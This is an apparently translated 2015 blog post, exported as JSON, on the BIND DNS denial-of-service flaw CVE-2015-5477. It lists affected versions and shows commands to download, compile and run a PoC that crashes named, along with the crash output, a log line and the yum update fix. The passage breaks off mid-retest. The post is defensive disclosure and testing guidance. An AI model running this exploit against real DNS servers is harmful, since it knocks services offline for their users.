{"id":417,"date":"2015-08-08T10:30:59","date_gmt":"2015-08-08T02:30:59","guid":{"rendered":"http:\/\/www.ipcpu.com\/?p=417"},"modified":"2015-08-08T10:30:59","modified_gmt":"2015-08-08T02:30:59","slug":"cve-2015-5477","status":"publish","type":"post","link":"https:\/\/c.ipcpu.com\/2015\/08\/cve-2015-5477\/","title":{"rendered":"Serious DoS Vulnerability Disclosed in the BIND DNS Server Software (CVE-2015-5477)"},"content":{"rendered":"
Serious DoS Vulnerability Disclosed in the BIND DNS Server Software (CVE-2015-5477)<\/p>\n
ISC recently disclosed a security vulnerability (CVE-2015-5477) that affects every current BIND version other than the latest. Attackers can exploit it to launch a DoS attack against the BIND DNS service, causing the DNS service process to terminate.<\/p>\n
Self-compiled versions: 9.1.0 -> 9.8.x, 9.9.0 -> 9.9.7-P1, 9.10.0 -> 9.10.2-P2
Redhat AS6: versions < bind-9.8.2-0.37.rc1.el6_7.2
Redhat AS5: versions < bind-9.3.6-25.P1.el5_11.3<\/p>\n
Very dangerous: do not test against production services. A vulnerable DNS daemon will crash.<\/strong> B. Test results<\/p>\n On inspection, the named process had crashed.<\/p>\n C. Service log<\/p>\n Upgrade to the latest version; manually compiled versions can also be patched.<\/p>\n The official website does not appear to offer a patch package; one can be found in the srpm files provided on Redhat's FTP.<\/p>\n Testing after the update<\/p>\n
A. Test method<\/p>\n[@ ~]# wget http:\/\/NOTVALID\/script\/tkill.c
[@ ~]# gcc -g -o tkill tkill.c
[@ ~]# chmod a+x tkill
[@ ~]# .\/tkill localhost
# If the DNS service crashes, the DNS server is vulnerable; if the words 'not vulnerable' appear, the vulnerability did not take effect.<\/ol><\/pre>\n
[@ ~]# .\/tkill localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: \"9.11.0pre-alpha\"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed<\/ol><\/pre>\n
Aug 4 15:32:48 dns named[2717]: client a.b.c. d#42212 (foo.bar): view north_america: query: foo. bar ANY TKEY + (x.y.z.zz)<\/ol><\/pre>\n
Solution:<\/h3>\n
[@ ~]# yum update bind<\/ol><\/pre>\n
[@ ~]# .\/tkill localhost
--- PoC